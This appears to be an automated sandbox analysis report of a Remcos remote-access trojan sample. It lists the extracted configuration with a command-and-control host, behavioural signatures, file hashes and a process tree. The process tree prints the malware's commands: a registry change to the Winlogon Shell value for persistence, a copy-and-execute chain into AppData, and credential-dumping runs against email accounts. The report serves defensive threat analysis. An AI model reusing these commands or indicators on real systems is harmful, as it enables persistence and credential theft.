Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/05/2023, 05:30

General

  • Target

    http://104.234.10.91/433/IE_NET_CACHE.exe

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

divdemoce.duckdns.org:35639

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    dtas.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Rmc-GZATCK

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Program crash 2 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry class 56 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://104.234.10.91/433/IE_NET_CACHE.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3700
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3700 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:3460
    • C:\Users\Admin\Desktop\IE_NET_CACHE.exe
      "C:\Users\Admin\Desktop\IE_NET_CACHE.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4916
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 10 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\widow\wid.exe,"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 10
          4⤵
          • Runs ping.exe
          PID:4028
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\widow\wid.exe,"
          4⤵
          • Modifies WinLogon for persistence
          PID:4012
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\Users\Admin\Desktop\IE_NET_CACHE.exe" "C:\Users\Admin\AppData\Roaming\widow\wid.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\AppData\Roaming\widow\wid.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4628
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 14
          4⤵
          • Runs ping.exe
          PID:3984
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 14
          4⤵
          • Runs ping.exe
          PID:4740
        • C:\Users\Admin\AppData\Roaming\widow\wid.exe
          "C:\Users\Admin\AppData\Roaming\widow\wid.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1908
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2132
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\nzasprsguo"
              6⤵
                PID:456
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\qbfdqjdaqwhsp"
                6⤵
                • Accesses Microsoft Outlook accounts
                PID:3884
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\avtvrunceezxzrueo"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3900
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 1428
              5⤵
              • Program crash
              PID:3636
      • C:\Users\Admin\Desktop\IE_NET_CACHE.exe
        "C:\Users\Admin\Desktop\IE_NET_CACHE.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\widow\wid.exe,"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3448
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 8
            4⤵
            • Runs ping.exe
            PID:4400
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\widow\wid.exe,"
            4⤵
            • Modifies WinLogon for persistence
            PID:1492
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /c ping 127.0.0.1 -n 18 > nul && copy "C:\Users\Admin\Desktop\IE_NET_CACHE.exe" "C:\Users\Admin\AppData\Roaming\widow\wid.exe" && ping 127.0.0.1 -n 18 > nul && "C:\Users\Admin\AppData\Roaming\widow\wid.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2408
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 18
            4⤵
            • Runs ping.exe
            PID:2900
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 18
            4⤵
            • Runs ping.exe
            PID:4996
          • C:\Users\Admin\AppData\Roaming\widow\wid.exe
            "C:\Users\Admin\AppData\Roaming\widow\wid.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3864
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
                PID:2688
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 1404
                5⤵
                • Program crash
                PID:1236
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1908 -ip 1908
        1⤵
          PID:2188
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3864 -ip 3864
          1⤵
            PID:4012

          Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IE_NET_CACHE.exe.log

                  Filesize

                  1KB

                  MD5

                  9a2d0ce437d2445330f2646472703087

                  SHA1

                  33c83e484a15f35c2caa3af62d5da6b7713a20ae

                  SHA256

                  30ea2f716e85f8d14a201e3fb0897d745a01b113342dfb7a9b7ac133c4ef150c

                  SHA512

                  a61d18d90bfad9ea8afdfa37537cfea3d5a3d0c161e323fa65840c283bdc87c3de85daaff5519beea2f2719eec1c68398eea8679b55ff733a61052f073162d5d

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P8NMKCW2\IE_NET_CACHE[1].exe

                  Filesize

                  899KB

                  MD5

                  dc2bc0ba4c3bcdd6925e63c422d5024f

                  SHA1

                  567997a9af276708ea05d42b0a83274e27531033

                  SHA256

                  1b910eadeb87901d93f903a51440947b6feada6a4f1960ade0d7841cd50ee4a3

                  SHA512

                  ffa2d78abe1ce56758ca11050091345ddf96fd4f08226af33c2e166b69f2964d535f4420dcbb0c946179add89afc41cbb77469668ba2f4f0619de1f69d5bbef8

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\P8NMKCW2\suggestions[1].en-US

                  Filesize

                  17KB

                  MD5

                  5a34cb996293fde2cb7a4ac89587393a

                  SHA1

                  3c96c993500690d1a77873cd62bc639b3a10653f

                  SHA256

                  c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

                  SHA512

                  e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

                • C:\Users\Admin\AppData\Local\Temp\nzasprsguo

                  Filesize

                  4KB

                  MD5

                  7e7e8e77a909ae1ac11fb356c3430a5e

                  SHA1

                  ef6c5ac6efc7104809b00840dd24a8d74e706fd4

                  SHA256

                  d3e8da27af617990bdfcaef5c3617788a606ba5860967a679fa6d5279772a985

                  SHA512

                  fe6a8722197e4cd5f61ad7182c66f6cba60ada6ca482c12eefa184fb7cb509362142f1767cb89126bfa8caaa6ed087bfd0287aacbbb56dbaa9bc2245815b1bfb

                • C:\Users\Admin\AppData\Roaming\remcos\dtas.dat

                  Filesize

                  182B

                  MD5

                  22bf1673bf3eb91ff19d6e130c29fac7

                  SHA1

                  e72d9f7d45e87d352ea1b8df43446052b369c40f

                  SHA256

                  7066930cf01c7582ce3d62fdebb4f551abb982a5ac3590277d1d4bf4f44d1353

                  SHA512

                  2fd15fcf4ca5df4f9a6c5780d4c98e7b50f56096e1749ce0ec9b8e843448b5ccfa2f2d372bd6c8798880fa8e3f5ff6834280f396593523861ca35a52d10a513b

                • C:\Users\Admin\AppData\Roaming\widow\wid.exe

                  Filesize

                  899KB

                  MD5

                  dc2bc0ba4c3bcdd6925e63c422d5024f

                  SHA1

                  567997a9af276708ea05d42b0a83274e27531033

                  SHA256

                  1b910eadeb87901d93f903a51440947b6feada6a4f1960ade0d7841cd50ee4a3

                  SHA512

                  ffa2d78abe1ce56758ca11050091345ddf96fd4f08226af33c2e166b69f2964d535f4420dcbb0c946179add89afc41cbb77469668ba2f4f0619de1f69d5bbef8

                • C:\Users\Admin\AppData\Roaming\widow\wid.exe

                  Filesize

                  899KB

                  MD5

                  dc2bc0ba4c3bcdd6925e63c422d5024f

                  SHA1

                  567997a9af276708ea05d42b0a83274e27531033

                  SHA256

                  1b910eadeb87901d93f903a51440947b6feada6a4f1960ade0d7841cd50ee4a3

                  SHA512

                  ffa2d78abe1ce56758ca11050091345ddf96fd4f08226af33c2e166b69f2964d535f4420dcbb0c946179add89afc41cbb77469668ba2f4f0619de1f69d5bbef8

                • C:\Users\Admin\AppData\Roaming\widow\wid.exe

                  Filesize

                  899KB

                  MD5

                  dc2bc0ba4c3bcdd6925e63c422d5024f

                  SHA1

                  567997a9af276708ea05d42b0a83274e27531033

                  SHA256

                  1b910eadeb87901d93f903a51440947b6feada6a4f1960ade0d7841cd50ee4a3

                  SHA512

                  ffa2d78abe1ce56758ca11050091345ddf96fd4f08226af33c2e166b69f2964d535f4420dcbb0c946179add89afc41cbb77469668ba2f4f0619de1f69d5bbef8

                • C:\Users\Admin\Desktop\IE_NET_CACHE.exe

                  Filesize

                  899KB

                  MD5

                  dc2bc0ba4c3bcdd6925e63c422d5024f

                  SHA1

                  567997a9af276708ea05d42b0a83274e27531033

                  SHA256

                  1b910eadeb87901d93f903a51440947b6feada6a4f1960ade0d7841cd50ee4a3

                  SHA512

                  ffa2d78abe1ce56758ca11050091345ddf96fd4f08226af33c2e166b69f2964d535f4420dcbb0c946179add89afc41cbb77469668ba2f4f0619de1f69d5bbef8

                • C:\Users\Admin\Desktop\IE_NET_CACHE.exe

                  Filesize

                  899KB

                  MD5

                  dc2bc0ba4c3bcdd6925e63c422d5024f

                  SHA1

                  567997a9af276708ea05d42b0a83274e27531033

                  SHA256

                  1b910eadeb87901d93f903a51440947b6feada6a4f1960ade0d7841cd50ee4a3

                  SHA512

                  ffa2d78abe1ce56758ca11050091345ddf96fd4f08226af33c2e166b69f2964d535f4420dcbb0c946179add89afc41cbb77469668ba2f4f0619de1f69d5bbef8

                • C:\Users\Admin\Desktop\IE_NET_CACHE.exe.62230jf.partial

                  Filesize

                  899KB

                  MD5

                  dc2bc0ba4c3bcdd6925e63c422d5024f

                  SHA1

                  567997a9af276708ea05d42b0a83274e27531033

                  SHA256

                  1b910eadeb87901d93f903a51440947b6feada6a4f1960ade0d7841cd50ee4a3

                  SHA512

                  ffa2d78abe1ce56758ca11050091345ddf96fd4f08226af33c2e166b69f2964d535f4420dcbb0c946179add89afc41cbb77469668ba2f4f0619de1f69d5bbef8

                • memory/456-231-0x0000000000400000-0x0000000000478000-memory.dmp

                  Filesize

                  480KB

                • memory/456-211-0x0000000000400000-0x0000000000478000-memory.dmp

                  Filesize

                  480KB

                • memory/456-218-0x0000000000400000-0x0000000000478000-memory.dmp

                  Filesize

                  480KB

                • memory/456-214-0x0000000000400000-0x0000000000478000-memory.dmp

                  Filesize

                  480KB

                • memory/1504-151-0x0000000005340000-0x0000000005350000-memory.dmp

                  Filesize

                  64KB

                • memory/1504-152-0x0000000005340000-0x0000000005350000-memory.dmp

                  Filesize

                  64KB

                • memory/1504-154-0x0000000005340000-0x0000000005350000-memory.dmp

                  Filesize

                  64KB

                • memory/1908-192-0x00000000055B0000-0x00000000055C0000-memory.dmp

                  Filesize

                  64KB

                • memory/1908-196-0x00000000055B0000-0x00000000055C0000-memory.dmp

                  Filesize

                  64KB

                • memory/1908-175-0x0000000000130000-0x0000000000216000-memory.dmp

                  Filesize

                  920KB

                • memory/1908-176-0x00000000055B0000-0x00000000055C0000-memory.dmp

                  Filesize

                  64KB

                • memory/1908-177-0x00000000055B0000-0x00000000055C0000-memory.dmp

                  Filesize

                  64KB

                • memory/1908-178-0x00000000055B0000-0x00000000055C0000-memory.dmp

                  Filesize

                  64KB

                • memory/1908-193-0x00000000055B0000-0x00000000055C0000-memory.dmp

                  Filesize

                  64KB

                • memory/1908-191-0x00000000055B0000-0x00000000055C0000-memory.dmp

                  Filesize

                  64KB

                • memory/2132-245-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-200-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-237-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-210-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-236-0x0000000010000000-0x0000000010019000-memory.dmp

                  Filesize

                  100KB

                • memory/2132-233-0x0000000010000000-0x0000000010019000-memory.dmp

                  Filesize

                  100KB

                • memory/2132-246-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-198-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-199-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-238-0x0000000010000000-0x0000000010019000-memory.dmp

                  Filesize

                  100KB

                • memory/2132-202-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-203-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-204-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-205-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-206-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-207-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2132-208-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/2688-240-0x0000000000400000-0x0000000000481000-memory.dmp

                  Filesize

                  516KB

                • memory/3864-195-0x0000000005560000-0x0000000005570000-memory.dmp

                  Filesize

                  64KB

                • memory/3864-197-0x0000000005560000-0x0000000005570000-memory.dmp

                  Filesize

                  64KB

                • memory/3864-216-0x0000000005560000-0x0000000005570000-memory.dmp

                  Filesize

                  64KB

                • memory/3864-194-0x0000000005560000-0x0000000005570000-memory.dmp

                  Filesize

                  64KB

                • memory/3864-190-0x0000000005560000-0x0000000005570000-memory.dmp

                  Filesize

                  64KB

                • memory/3884-213-0x0000000000400000-0x0000000000457000-memory.dmp

                  Filesize

                  348KB

                • memory/3884-220-0x0000000000400000-0x0000000000457000-memory.dmp

                  Filesize

                  348KB

                • memory/3884-217-0x0000000000400000-0x0000000000457000-memory.dmp

                  Filesize

                  348KB

                • memory/3884-225-0x0000000000400000-0x0000000000457000-memory.dmp

                  Filesize

                  348KB

                • memory/3900-228-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/3900-226-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/3900-227-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/3900-219-0x0000000000400000-0x0000000000424000-memory.dmp

                  Filesize

                  144KB

                • memory/4916-155-0x0000000005CE0000-0x0000000005CF0000-memory.dmp

                  Filesize

                  64KB

                • memory/4916-153-0x0000000005CE0000-0x0000000005CF0000-memory.dmp

                  Filesize

                  64KB

                • memory/4916-149-0x0000000005CE0000-0x0000000005CF0000-memory.dmp

                  Filesize

                  64KB

                • memory/4916-148-0x0000000005CE0000-0x0000000005CF0000-memory.dmp

                  Filesize

                  64KB

                • memory/4916-147-0x0000000005990000-0x000000000599A000-memory.dmp

                  Filesize

                  40KB

                • memory/4916-146-0x0000000005AF0000-0x0000000005B82000-memory.dmp

                  Filesize

                  584KB

                • memory/4916-145-0x00000000060A0000-0x0000000006644000-memory.dmp

                  Filesize

                  5.6MB

                • memory/4916-144-0x00000000059D0000-0x0000000005A6C000-memory.dmp

                  Filesize

                  624KB

                • memory/4916-143-0x0000000000F50000-0x0000000001036000-memory.dmp

                  Filesize

                  920KB